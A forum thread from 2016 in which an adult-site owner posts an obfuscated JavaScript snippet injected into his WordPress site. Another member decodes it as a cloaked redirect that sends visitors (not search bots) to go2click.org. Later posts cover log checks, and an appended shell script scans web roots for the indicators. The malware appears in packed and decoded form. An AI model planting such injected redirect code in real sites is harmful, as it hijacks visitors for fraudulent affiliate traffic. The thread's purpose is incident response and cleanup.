Old 10-23-2016, 01:05 AM   #1
lezinterracial
Confirmed User
 
Industry Role:
Join Date: Jul 2012
Posts: 3,065
Found a script in my site

This is from my site bestfreecamgirls.com. I noticed some redirects when backing out of the site.

Gonna update my wordpress sites. Change my password. Any other ideas?
Here is the code I found. Thanks.

Code:
<br></br><br></br>
<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3=1N;c=z;b.1M=d(){3=1L(d(){4(c==z){x 5=D 1J();5.1K(5.1O()+B*B*24*7*1P);x u=D 1U("(1T\\/|G-1S|G-1Q|k 1R|1I-k|1H|1y|1z|1x|1w|1u-1v|1A-1B|1G|1F|1E|1C|1D|1V|o-1W|o 2g 2f|2e|2c|2d|2h|2i|2n|2m|2l|2j|2k |2b|2a|1t.l|20|1Z|1X|1Y|22|23.E|29|28|27|25|26|2o|L-N|H|J|t|W|S|T|Y|U|V|11 9|Z|Q|X|12|M|P|O|I|K|R|1s|1l|1k|1j|1h|1i|t|1m.13|1r|1q|1p|1o.l|1g.9|18 2|17|16|14|15|19|1a|1e|1c|1b|1d|1f|1n|21|2G|3B|3A-a|3z|3x|3y|3C|3D|3I|3H|3G|3E|3F|3w|2p|v v a|q-p-C.n.r|3v|3n|3m|3l 2 a|3j|3k-3o|3p-3u-2|3t-q-2.n|3s.3q|3K|3J|3Z|47|42|43:41|45-r|49|48|46|44|40|3P 3Q 3O|3N 3L 3M|3R.C|3S|3X|3Y|3W-2|3V|3T|3U|h|3r|3h|E.2I|2H-3i|2E|2F|h|2J|2K|2P|2O|2N|2L|2M|2D|2C|2u|p.2t|2s|2q|2r|2v|2w|2B|2A|y!j-2z|2x 2y-2Q 9|2R)",\'i\');4(!u.3a(39.38)&&f.e.36("g")==-1){f.e="g=1; 37="+5.3b()+"; 
3c=/";4(s.3g((s.3f()*10))<10){b.3e.3d("\\35\\F\\F\\34\\2W\\0\\0\\8\\6\\w\\A\\2V\\2U\\A\\2S\\2T\\6\\2X\\8\\0\\8\\6\\0\\w\\2Y\\m\\33\\0\\m")}}c=32}},31)};b.2Z=d(){4(3){30(3)}};',62,258,'x2f||crawler|blur_started1|if|now|x6f||x67|Bot|spider|window|switch_flag1|function|cookie|document|__potus001|Twitterbot|||Google|org|x31|com|FAST|archive|web|bot|Math|dotbot|re|gnam|x32|var||false|x63|60|net|new|bnf|x74|Googlebot|tagoobot|postrank|MJ12bot|turnitinbot|ips|citeseerxbot|agent|twengabot|spbot|CyberPatrol|scribdbot|yanga|buzzbot|yandexbot|purebot|woriobot|voilabot|mlbot|Voyager||Linguee|baiduspider|RU_Bot|domaincrawler|wbsearchbot|Aboundex|ahrefsbot|sistrix|summify|ccbot|ec2linkfinder|seznambot|gslfbot|edisterbot|aihitbot|NerdByNature|blekkobot|ezooms|Adidxbot|linkdex|sitebot|Mail|intelium_bot|europarchive|findthatfile|heritrix|discobot|page2rss|grub|Commons|HttpClient|curl|wget|slurp|java|Python|urllib|phpcrawl|msnbot|nutch|httpunit|libwww|bingbot|Mediapartners|Date|setTime|setTimeout|onblur|null|getTime|1000|Image|favicon|Mobile|googlebot|RegExp|jyxobot|WebCrawler|netresearchserver|speedy|antibot|UsineNouvelleCrawler|facebookexternalhit|fluffy|bibnum||yacybot|AISearchBot|panscient|msrbot|findlink|webcrawler|httrack|teoma|convera|biglotron|Crawler|Enterprise|seekbot|gigablast|GingerCrawler|webmon|ia_archiver|ngbot|exabot|IOI|openindexspider|TweetmemeBot|crawler4j|Applebot|org_bot|Qwantify|findxbot|SemrushBot|Domain|Re|asr|lipperhey|yoozBot|BUbiNG|xovibot|ADmantX|Facebot|yeti|A6|fr_bot|OrangeBot|memorybot|ltx71|nerdybot|SemanticScholarBot|MegaIndex|AdvBot|Animator|AddThis|x6b|x2e|x69|x6c|x3a|x72|x36|onfocus|clearTimeout|5000|true|x37|x70|x68|indexOf|expires|userAgent|navigator|test|toUTCString|path|replace|location|random|floor|smtbot|Indexer|toplistbot|seokicks|content|integromedb|coccoc|robot|it2media|info|cXensebot|siteexplorer|ip|domain|backlinkcrawler|acoonbot|lssbot|careerbot|sogou|lb|RetrevoPageAnalyzer|wotbox|wocbot|drupact|webcompanycrawler|lssrocketcrawler|DuckDu
ckBot|ichiro|proximic|elisabot|Metadata|Scaper|CC|Service|Lipperhey|SEO|g00g1e|GrapeshotCrawler|SimpleCrawler|Livelapbot|binlar|fr|urlappendbot|brainobot|changedetection|InterfaxScanBot|Search|arabot|WeSEE|psbot|niki|360Spider|blexbot|rogerbot|CrystalSemanticsBot'.split('|'),0,{}));</script>
__________________
Live Sex Shows
Old 10-23-2016, 02:01 AM   #2
just a punk
So fuckin' bored
 
Industry Role:
Join Date: Jun 2003
Posts: 32,381
Quote:
Originally Posted by lezinterracial View Post
This is from my site bestfreecamgirls.com. I noticed some redirects when backing out of the site.

Gonna update my wordpress sites. Change my password. Any other ideas?
Here is the code I found. Thanks.

Here is the original code:

Code:
blur_started1 = null;
switch_flag1 = false;
window.onblur = function(){blur_started1 = setTimeout(function(){if(switch_flag1==false){var now = new Date();
now.setTime(now.getTime()+60*60*24*7*1000);
var re = new RegExp("(googlebot\/|Googlebot-Mobile|Googlebot-Image|Google favicon|Mediapartners-Google|bingbot|slurp|java|wget|curl|Commons-HttpClient|Python-urllib|libwww|httpunit|nutch|phpcrawl|msnbot|jyxobot|FAST-WebCrawler|FAST Enterprise Crawler|biglotron|teoma|convera|seekbot|gigablast|exabot|ngbot|ia_archiver|GingerCrawler|webmon |httrack|webcrawler|grub.org|UsineNouvelleCrawler|antibot|netresearchserver|speedy|fluffy|bibnum.bnf|findlink|msrbot|panscient|yacybot|AISearchBot|IOI|ips-agent|tagoobot|MJ12bot|dotbot|woriobot|yanga|buzzbot|mlbot|yandexbot|purebot|Linguee Bot|Voyager|CyberPatrol|voilabot|baiduspider|citeseerxbot|spbot|twengabot|postrank|turnitinbot|scribdbot|page2rss|sitebot|linkdex|Adidxbot|blekkobot|ezooms|dotbot|Mail.RU_Bot|discobot|heritrix|findthatfile|europarchive.org|NerdByNature.Bot|sistrix crawler|ahrefsbot|Aboundex|domaincrawler|wbsearchbot|summify|ccbot|edisterbot|seznambot|ec2linkfinder|gslfbot|aihitbot|intelium_bot|facebookexternalhit|yeti|RetrevoPageAnalyzer|lb-spider|sogou|lssbot|careerbot|wotbox|wocbot|ichiro|DuckDuckBot|lssrocketcrawler|drupact|webcompanycrawler|acoonbot|openindexspider|gnam gnam spider|web-archive-net.com.bot|backlinkcrawler|coccoc|integromedb|content crawler spider|toplistbot|seokicks-robot|it2media-domain-crawler|ip-web-crawler.com|siteexplorer.info|elisabot|proximic|changedetection|blexbot|arabot|WeSEE:Search|niki-bot|CrystalSemanticsBot|rogerbot|360Spider|psbot|InterfaxScanBot|Lipperhey SEO Service|CC Metadata Scaper|g00g1e.net|GrapeshotCrawler|urlappendbot|brainobot|fr-crawler|binlar|SimpleCrawler|Livelapbot|Twitterbot|cXensebot|smtbot|bnf.fr_bot|A6-Indexer|ADmantX|Facebot|Twitterbot|OrangeBot|memorybot|AdvBot|MegaIndex|SemanticScholarBot|ltx71|nerdybot|xovibot|BUbiNG|Qwantify|archive.org_bot|Applebot|TweetmemeBot|crawler4j|findxbot|SemrushBot|yoozBot|lipperhey|y!j-asr|Domain Re-Animator Bot|AddThis)", 'i');
if(!re.test(navigator.userAgent)&&document.cookie.indexOf("__potus001")==-1){document.cookie = "__potus001=1; expires="+now.toUTCString()+"; path=/";
if(Math.floor((Math.random()*10))<10){window.location.replace("http://go2click.org/go/2617/1")}}switch_flag1 = true}}, 5000)};
window.onfocus = function(){if(blur_started1){clearTimeout(blur_started1)}};
It's a cloaker, which redirects SE bots to go2click.org/go/2617/1

P.S. Your site has been hacked.
__________________
Obey the Cowgod
Old 10-23-2016, 02:18 AM   #3
lezinterracial
Confirmed User
 
Industry Role:
Join Date: Jul 2012
Posts: 3,065
Quote:
Originally Posted by CyberSEO View Post
Here is the original code:

It's a cloaker, which redirects SE bots to go2click.org/go/2617/1

P.S. Your site has been hacked.

Yep. The go2click redirects to iwantu.com/aff.php?dynamicpage=iwu_wlp_5st_tmr_a&a_bid=dc57a3f7&utm_sub=opnfnl&utm_source=int&utm_medium=web&utm_campaign=476cb13b&utm_content=2617&data2=06pvh21bg0082


Thanks CyberSEO. Now, I have to figure out when and how they did it. Maybe some weak PHP on my part. I don't know
__________________
Live Sex Shows
Old 10-23-2016, 02:24 AM   #4
just a punk
So fuckin' bored
 
Industry Role:
Join Date: Jun 2003
Posts: 32,381
Quote:
Originally Posted by lezinterracial View Post
Thanks CyberSEO. Now, I have to figure out when and how they did it. Maybe some weak PHP on my part. I don't know
If I were you, I would firstly report the rogue affiliate to iwantu.com and make sure he hasn't been paid
__________________
Obey the Cowgod
Old 10-23-2016, 04:39 AM   #5
lezinterracial
Confirmed User
 
Industry Role:
Join Date: Jul 2012
Posts: 3,065
Quote:
Originally Posted by CyberSEO View Post
If I were you, I would firstly report the rogue affiliate to iwantu.com and make sure he hasn't been paid
https://help.dreamhost.com/hc/en-us/...ite-was-hacked

Noticed no world writable directories.
find . -type d -perm -o=w

And no logins from any other ips over the past month. I used the command

last -if /var/log/wtmp.1 | grep youruser | awk '{print $3}' | sort | uniq -c


Just gotta keep looking through the logs.
__________________
Live Sex Shows
Old 10-23-2016, 10:14 PM   #6
lezinterracial
Confirmed User
 
Industry Role:
Join Date: Jul 2012
Posts: 3,065
Oh well. Searched all through my logs but I couldn't find when this happened. I e-mailed iwantu.org support. Hoping they could help me some with a time frame. But I notice the go2click.org link redirects to different sites.

I scanned my computer for malware, none found. I went ahead and updated PHP 5.5 to 5.6. Weird timing, 'cause DreamHost just moved me to a new server this evening.

Just gonna keep an eye on the files and see if they get modified again. Then I will know where to look in the logs.

On a positive note. I have learned much today. First time I have used putty to connect to my web server to get a shell. Learned some about PHP hacking.
__________________
Live Sex Shows
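
The file checks from the posts above, gathered into one sweep as an added example (not code from the thread): it searches a web root for the strings visible in the posted script and records a hash baseline so a later modification shows up. It assumes GNU find, grep and coreutils; the function names are made up for this example.

```shell
#!/bin/sh
# Added example (GNU find/grep/coreutils assumed): sweep a web root for the
# injected script discussed in this thread, then baseline file hashes so a
# repeat modification is caught.

# scan_webroot DIR: list PHP/JS/HTML files containing an indicator from the
# posted code. The packed copy stores the redirect URL as \x escapes, so the
# domain string only matches decoded copies; the packer header and the cookie
# name match the packed form.
scan_webroot() {
    find "$1" -type f \( -name '*.php' -o -name '*.js' -o -name '*.htm*' \) \
        -exec grep -lF -e 'eval(function(p,a,c,k,e,d)' \
                       -e '__potus001' -e 'go2click.org' {} + | sort
}

# hits_with_mtime DIR: the same hits with their last-modified time, a first
# guess at when the injection happened (mtime can be reset by an intruder).
hits_with_mtime() {
    scan_webroot "$1" | while IFS= read -r f; do
        stat -c '%y  %n' "$f"
    done
}

# write_baseline DIR FILE: SHA-256 of every file under DIR, written to FILE.
# FILE must be an absolute path outside DIR.
write_baseline() {
    ( cd "$1" && find . -type f -exec sha256sum {} + | sort ) > "$2"
}

# changed_since_baseline DIR FILE: paths added, removed or modified since
# write_baseline ran (paths containing whitespace are not handled).
changed_since_baseline() {
    cur=$(mktemp)
    write_baseline "$1" "$cur"
    comm -3 "$2" "$cur" | awk '{print $2}' | sort -u
    rm -f "$cur"
}

# Usage: sh sweep.sh /path/to/webroot /absolute/path/to/baseline.sha256
if [ "$#" -eq 2 ]; then
    hits_with_mtime "$1"
    if [ -f "$2" ]; then
        changed_since_baseline "$1" "$2"
    else
        write_baseline "$1" "$2"
    fi
fi
```

The sweep only covers files on disk; a script stored in the WordPress database (a post, widget or option) would not be found this way.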